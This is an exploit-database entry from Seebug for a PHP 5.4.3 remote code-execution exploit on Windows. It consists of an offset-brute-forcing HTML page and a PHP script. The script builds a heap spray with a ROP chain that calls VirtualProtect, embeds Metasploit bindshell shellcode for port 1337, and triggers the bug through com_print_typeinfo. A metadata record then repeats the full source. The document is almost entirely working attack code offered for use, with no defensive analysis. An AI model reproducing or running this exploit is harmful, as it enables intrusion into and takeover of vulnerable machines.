ID SSV:72876
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00
Description
No description provided by source.
// Exploit Title: PHP 5.4 (5.4.3) Code Execution 0day (Win32)
// Exploit author: 0in (Maksymilian Motyl)
// Email: 0in(dot)email(at)gmail.com
// * Bug with Variant type parsing originally discovered by Condis
// Tested on Windows XP SP3 fully patched (Polish)
===================
offset-brute.html
===================
<html><body>
<title>0day</title>
<center>
<font size=7>PHP 5.4.3 0day by 0in & cOndis</font><br>
<textarea rows=50 cols=50 id="log"></textarea>
</center>
<script>
function sleep(milliseconds) {
var start = new Date().getTime();
for (var i = 0; i < 1e7; i++) {
if ((new Date().getTime() - start) > milliseconds){
break;
}
}
}
function makeRequest(url, parameters)
{
var xmlhttp = new XMLHttpRequest();
if (window.XMLHttpRequest) {
xmlhttp = new XMLHttpRequest();
if (xmlhttp.overrideMimeType) {
xmlhttp.overrideMimeType('text/xml');
}
} else if (window.ActiveXObject) {
// IE
try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); }
catch (e) {
try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); }
catch (e) {}
}
}
if (!xmlhttp) {
alert('Giving up :( Cannot create an XMLHTTP instance');
return false;
}
xmlhttp.open("GET",url,true);
xmlhttp.send(null);
return true;
}
test=document.getElementById("log");
for(offset=0;offset<300;offset++)
{
log.value+="Trying offset:"+offset+"\r\n";
makeRequest("0day.php?offset="+offset);
sleep(500);
}
</script></body></html>
===================
0day.php
===================
<?php
$spray = str_repeat("\x90",0x200);
$offset=$_GET['offset'];
// 775DF0Da # ADD ESP,10 # RETN ** [ole32.dll]
$spray = substr_replace($spray, "\xda\xf0\x5d\x77", (strlen($spray))*-1,(strlen($spray))*-1);
// :> 0x048d0030
$spray = substr_replace($spray, pack("L",0x048d0030+$offset), (strlen($spray)-0x8)*-1,(strlen($spray))*-1);
//0x7752ae9f (RVA : 0x0005ae7f) : # XCHG EAX,ESP # MOV ECX,468B0000 # OR AL,3 # RETN [ole32.dll]
$spray = substr_replace($spray, "\x9f\xae\x52\x77", (strlen($spray)-0x10)*-1,(strlen($spray))*-1);
// Adress of VirtualProtect 0x7c801ad4
$spray = substr_replace($spray, "\xd4\x1a\x80\x7c", (strlen($spray)-0x14)*-1,(strlen($spray))*-1);
// LPVOID lpAddress = 0x048d0060
$spray = substr_replace($spray, pack("L",0x048d0060+$offset), (strlen($spray)-0x1c)*-1,(strlen($spray))*-1);
// SIZE_T dwSize = 0x01000000
$spray = substr_replace($spray, "\x00\x00\x10\x00", (strlen($spray)-0x20)*-1,(strlen($spray))*-1);
// DWORD flNewProtect = PAGE_EXECUTE_READWRITE (0x00000040) | 0xffffffc0
$spray = substr_replace($spray, "\x40\x00\x00\x00", (strlen($spray)-0x24)*-1,(strlen($spray))*-1);
// __out PDWORD lpflOldProtect = 0x04300070 | 0x105240000
// 0x048d0068
$spray = substr_replace($spray, pack("L",0x048d0068+$offset), (strlen($spray)-0x28)*-1,(strlen($spray))*-1);
//0x77dfe8b4 : # XOR EAX,EAX # ADD ESP,18 # INC EAX # POP EBP # RETN 0C ** [ADVAPI32.dll]
$spray = substr_replace($spray, "\xb4\xe8\xdf\x77", (strlen($spray)-0x18)*-1,4);
// Ret Address = 0x048d0080
$spray = substr_replace($spray, pack("L",0x048d0080+$offset), (strlen($spray)-0x48)*-1,4);
$stacktrack = "\xbc\x0c\xb0\xc0\x00";
// Universal win32 bindshell on port 1337 from metasploit
$shellcode = $stacktrack."\x33\xc9\x83\xe9\xb0".
"\x81\xc4\xd0\xfd\xff\xff".
"\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1d".
"\xcc\x32\x69\x83\xeb\xfc\xe2\xf4\xe1\xa6\xd9\x24\xf5\x35\xcd\x96".
"\xe2\xac\xb9\x05\x39\xe8\xb9\x2c\x21\x47\x4e\x6c\x65\xcd\xdd\xe2".
"\x52\xd4\xb9\x36\x3d\xcd\xd9\x20\x96\xf8\xb9\x68\xf3\xfd\xf2\xf0".
"\xb1\x48\xf2\x1d\x1a\x0d\xf8\x64\x1c\x0e\xd9\x9d\x26\x98\x16\x41".
"\x68\x29\xb9\x36\x39\xcd\xd9\x0f\x96\xc0\x79\xe2\x42\xd0\x33\x82".
"\x1e\xe0\xb9\xe0\x71\xe8\x2e\x08\xde\xfd\xe9\x0d\x96\x8f\x02\xe2".
"\x5d\xc0\xb9\x19\x01\x61\xb9\x29\x15\x92\x5a\xe7\x53\xc2\xde\x39".
"\xe2\x1a\x54\x3a\x7b\xa4\x01\x5b\x75\xbb\x41\x5b\x42\x98\xcd\xb9".
"\x75\x07\xdf\x95\x26\x9c\xcd\xbf\x42\x45\xd7\x0f\x9c\x21\x3a\x6b".
"\x48\xa6\x30\x96\xcd\xa4\xeb\x60\xe8\x61\x65\x96\xcb\x9f\x61\x3a".
"\x4e\x9f\x71\x3a\x5e\x9f\xcd\xb9\x7b\xa4\x37\x50\x7b\x9f\xbb\x88".
"\x88\xa4\x96\x73\x6d\x0b\x65\x96\xcb\xa6\x22\x38\x48\x33\xe2\x01".
"\xb9\x61\x1c\x80\x4a\x33\xe4\x3a\x48\x33\xe2\x01\xf8\x85\xb4\x20".
"\x4a\x33\xe4\x39\x49\x98\x67\x96\xcd\x5f\x5a\x8e\x64\x0a\x4b\x3e".
"\xe2\x1a\x67\x96\xcd\xaa\x58\x0d\x7b\xa4\x51\x04\x94\x29\x58\x39".
"\x44\xe5\xfe\xe0\xfa\xa6\x76\xe0\xff\xfd\xf2\x9a\xb7\x32\x70\x44".
"\xe3\x8e\x1e\xfa\x90\xb6\x0a\xc2\xb6\x67\x5a\x1b\xe3\x7f\x24\x96".
"\x68\x88\xcd\xbf\x46\x9b\x60\x38\x4c\x9d\x58\x68\x4c\x9d\x67\x38".
"\xe2\x1c\x5a\xc4\xc4\xc9\xfc\x3a\xe2\x1a\x58\x96\xe2\xfb\xcd\xb9".
"\x96\x9b\xce\xea\xd9\xa8\xcd\xbf\x4f\x33\xe2\x01\xf2\x02\xd2\x09".
"\x4e\x33\xe4\x96\xcd\xcc\x32\x69";
$spray = substr_replace($spray,$shellcode, (strlen($spray)-0x50)*-1,(strlen($shellcode)));
$fullspray="";
for($i=0;$i<0x4b00;$i++)
{
$fullspray.=$spray;
}
$j=array();
$e=array();
$b=array();
$a=array();
$c=array();
array_push($j,$fullspray);
array_push($e,$fullspray."W");
array_push($b,$fullspray."A");
array_push($a,$fullspray."S");
array_push($c,$fullspray."!");
$vVar = new VARIANT(0x048d0038+$offset);
// Shoot him
com_print_typeinfo($vVar); //CRASH -> 102F3986 FF50 10 CALL DWORD PTR DS:[EAX+10]
echo $arr;
echo $spray;
?>
{"lastseen": "2017-11-19T16:10:22", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "status": "cve,poc", "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2017-11-19T16:10:22", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T16:10:22", "rev": 2}, "vulnersScore": 0.2}, "href": "https://www.seebug.org/vuldb/ssvid-72876", "references": [], "enchantments_done": [], "id": "SSV:72876", "title": "PHP 5.4 (5.4.3) Code Execution (Win32)", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 4, "sourceData": "\n // Exploit Title: PHP 5.4 (5.4.3) Code Execution 0day (Win32)\r\n// Exploit author: 0in (Maksymilian Motyl)\r\n// Email: 0in(dot)email(at)gmail.com\r\n// * Bug with Variant type parsing originally discovered by Condis\r\n// Tested on Windows XP SP3 fully patched (Polish)\r\n\r\n\r\n===================\r\n offset-brute.html\r\n===================\r\n\r\n<html><body>\r\n<title>0day</title>\r\n<center>\r\n<font size=7>PHP 5.4.3 0day by 0in & cOndis</font><br>\r\n<textarea rows=50 cols=50 id="log"></textarea>\r\n</center>\r\n<script>\r\nfunction sleep(milliseconds) {\r\n var start = new Date().getTime();\r\n for (var i = 0; i < 1e7; i++) {\r\n if ((new Date().getTime() - start) > milliseconds){\r\n break;\r\n }\r\n }\r\n}\r\nfunction makeRequest(url, parameters)\r\n{\r\n var xmlhttp = new XMLHttpRequest();\r\n if (window.XMLHttpRequest) {\r\n xmlhttp = new XMLHttpRequest();\r\n if (xmlhttp.overrideMimeType) {\r\n xmlhttp.overrideMimeType('text/xml');\r\n }\r\n } else if (window.ActiveXObject) {\r\n // IE\r\n try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); }\r\n catch (e) {\r\n try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); }\r\n catch (e) {}\r\n }\r\n }\r\n\r\n if (!xmlhttp) {\r\n alert('Giving up :( Cannot create an XMLHTTP instance');\r\n return false;\r\n }\r\n\r\n\txmlhttp.open("GET",url,true);\r\n\txmlhttp.send(null);\r\n return true;\r\n}\r\ntest=document.getElementById("log");\r\nfor(offset=0;offset<300;offset++)\r\n{\r\n\tlog.value+="Trying offset:"+offset+"\\r\\n";\r\n\tmakeRequest("0day.php?offset="+offset);\r\n\tsleep(500);\r\n}\r\n\r\n</script></body></html>\r\n\r\n\r\n\r\n===================\r\n 0day.php\r\n===================\r\n\r\n<?php \r\n\r\n$spray = str_repeat("\\x90",0x200); \r\n$offset=$_GET['offset'];\r\n// 775DF0Da # ADD ESP,10 # RETN ** [ole32.dll] \r\n$spray = substr_replace($spray, "\\xda\\xf0\\x5d\\x77", (strlen($spray))*-1,(strlen($spray))*-1); \r\n// :> 0x048d0030\r\n$spray = substr_replace($spray, pack("L",0x048d0030+$offset), (strlen($spray)-0x8)*-1,(strlen($spray))*-1); \r\n\r\n//0x7752ae9f (RVA : 0x0005ae7f) : # XCHG EAX,ESP # MOV ECX,468B0000 # OR AL,3 # RETN [ole32.dll]\r\n$spray = substr_replace($spray, "\\x9f\\xae\\x52\\x77", (strlen($spray)-0x10)*-1,(strlen($spray))*-1); \r\n\r\n// Adress of VirtualProtect 0x7c801ad4\r\n$spray = substr_replace($spray, "\\xd4\\x1a\\x80\\x7c", (strlen($spray)-0x14)*-1,(strlen($spray))*-1);\r\n\r\n// LPVOID lpAddress = 0x048d0060\r\n$spray = substr_replace($spray, pack("L",0x048d0060+$offset), (strlen($spray)-0x1c)*-1,(strlen($spray))*-1);\r\n\r\n// SIZE_T dwSize = 0x01000000 \r\n$spray = substr_replace($spray, "\\x00\\x00\\x10\\x00", (strlen($spray)-0x20)*-1,(strlen($spray))*-1);\r\n\r\n// DWORD flNewProtect = PAGE_EXECUTE_READWRITE (0x00000040) | 0xffffffc0 \r\n$spray = substr_replace($spray, "\\x40\\x00\\x00\\x00", (strlen($spray)-0x24)*-1,(strlen($spray))*-1);\r\n// __out PDWORD lpflOldProtect = 0x04300070 | 0x105240000\r\n\r\n// 0x048d0068\r\n$spray = substr_replace($spray, pack("L",0x048d0068+$offset), (strlen($spray)-0x28)*-1,(strlen($spray))*-1);\r\n\r\n//0x77dfe8b4 : # XOR EAX,EAX # ADD ESP,18 # INC EAX # POP EBP # RETN 0C ** [ADVAPI32.dll]\r\n$spray = substr_replace($spray, "\\xb4\\xe8\\xdf\\x77", (strlen($spray)-0x18)*-1,4); \r\n// Ret Address = 0x048d0080 \r\n$spray = substr_replace($spray, pack("L",0x048d0080+$offset), (strlen($spray)-0x48)*-1,4); \r\n\r\n\r\n\r\n$stacktrack = "\\xbc\\x0c\\xb0\\xc0\\x00"; \r\n// Universal win32 bindshell on port 1337 from metasploit\r\n$shellcode = $stacktrack."\\x33\\xc9\\x83\\xe9\\xb0".\r\n "\\x81\\xc4\\xd0\\xfd\\xff\\xff".\r\n "\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x1d".\r\n "\\xcc\\x32\\x69\\x83\\xeb\\xfc\\xe2\\xf4\\xe1\\xa6\\xd9\\x24\\xf5\\x35\\xcd\\x96".\r\n "\\xe2\\xac\\xb9\\x05\\x39\\xe8\\xb9\\x2c\\x21\\x47\\x4e\\x6c\\x65\\xcd\\xdd\\xe2".\r\n "\\x52\\xd4\\xb9\\x36\\x3d\\xcd\\xd9\\x20\\x96\\xf8\\xb9\\x68\\xf3\\xfd\\xf2\\xf0".\r\n "\\xb1\\x48\\xf2\\x1d\\x1a\\x0d\\xf8\\x64\\x1c\\x0e\\xd9\\x9d\\x26\\x98\\x16\\x41".\r\n "\\x68\\x29\\xb9\\x36\\x39\\xcd\\xd9\\x0f\\x96\\xc0\\x79\\xe2\\x42\\xd0\\x33\\x82".\r\n "\\x1e\\xe0\\xb9\\xe0\\x71\\xe8\\x2e\\x08\\xde\\xfd\\xe9\\x0d\\x96\\x8f\\x02\\xe2".\r\n "\\x5d\\xc0\\xb9\\x19\\x01\\x61\\xb9\\x29\\x15\\x92\\x5a\\xe7\\x53\\xc2\\xde\\x39".\r\n "\\xe2\\x1a\\x54\\x3a\\x7b\\xa4\\x01\\x5b\\x75\\xbb\\x41\\x5b\\x42\\x98\\xcd\\xb9".\r\n "\\x75\\x07\\xdf\\x95\\x26\\x9c\\xcd\\xbf\\x42\\x45\\xd7\\x0f\\x9c\\x21\\x3a\\x6b".\r\n "\\x48\\xa6\\x30\\x96\\xcd\\xa4\\xeb\\x60\\xe8\\x61\\x65\\x96\\xcb\\x9f\\x61\\x3a".\r\n "\\x4e\\x9f\\x71\\x3a\\x5e\\x9f\\xcd\\xb9\\x7b\\xa4\\x37\\x50\\x7b\\x9f\\xbb\\x88".\r\n "\\x88\\xa4\\x96\\x73\\x6d\\x0b\\x65\\x96\\xcb\\xa6\\x22\\x38\\x48\\x33\\xe2\\x01".\r\n "\\xb9\\x61\\x1c\\x80\\x4a\\x33\\xe4\\x3a\\x48\\x33\\xe2\\x01\\xf8\\x85\\xb4\\x20".\r\n "\\x4a\\x33\\xe4\\x39\\x49\\x98\\x67\\x96\\xcd\\x5f\\x5a\\x8e\\x64\\x0a\\x4b\\x3e".\r\n "\\xe2\\x1a\\x67\\x96\\xcd\\xaa\\x58\\x0d\\x7b\\xa4\\x51\\x04\\x94\\x29\\x58\\x39".\r\n "\\x44\\xe5\\xfe\\xe0\\xfa\\xa6\\x76\\xe0\\xff\\xfd\\xf2\\x9a\\xb7\\x32\\x70\\x44".\r\n "\\xe3\\x8e\\x1e\\xfa\\x90\\xb6\\x0a\\xc2\\xb6\\x67\\x5a\\x1b\\xe3\\x7f\\x24\\x96".\r\n "\\x68\\x88\\xcd\\xbf\\x46\\x9b\\x60\\x38\\x4c\\x9d\\x58\\x68\\x4c\\x9d\\x67\\x38".\r\n "\\xe2\\x1c\\x5a\\xc4\\xc4\\xc9\\xfc\\x3a\\xe2\\x1a\\x58\\x96\\xe2\\xfb\\xcd\\xb9".\r\n "\\x96\\x9b\\xce\\xea\\xd9\\xa8\\xcd\\xbf\\x4f\\x33\\xe2\\x01\\xf2\\x02\\xd2\\x09".\r\n "\\x4e\\x33\\xe4\\x96\\xcd\\xcc\\x32\\x69";\r\n\r\n\r\n$spray = substr_replace($spray,$shellcode, (strlen($spray)-0x50)*-1,(strlen($shellcode))); \r\n$fullspray="";\r\nfor($i=0;$i<0x4b00;$i++)\r\n{\r\n\t$fullspray.=$spray;\r\n}\r\n$j=array();\r\n$e=array();\r\n$b=array();\r\n$a=array();\r\n$c=array();\r\n\r\narray_push($j,$fullspray);\r\narray_push($e,$fullspray."W");\r\narray_push($b,$fullspray."A");\r\narray_push($a,$fullspray."S");\r\narray_push($c,$fullspray."!");\r\n\r\n\r\n$vVar = new VARIANT(0x048d0038+$offset); \r\n// Shoot him\r\ncom_print_typeinfo($vVar); //CRASH -> 102F3986 FF50 10 CALL DWORD PTR DS:[EAX+10]\r\n\r\necho $arr;\r\n\r\necho $spray;\r\n\r\n?>\r\n\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-72876", "type": "seebug", "immutableFields": []}
{}
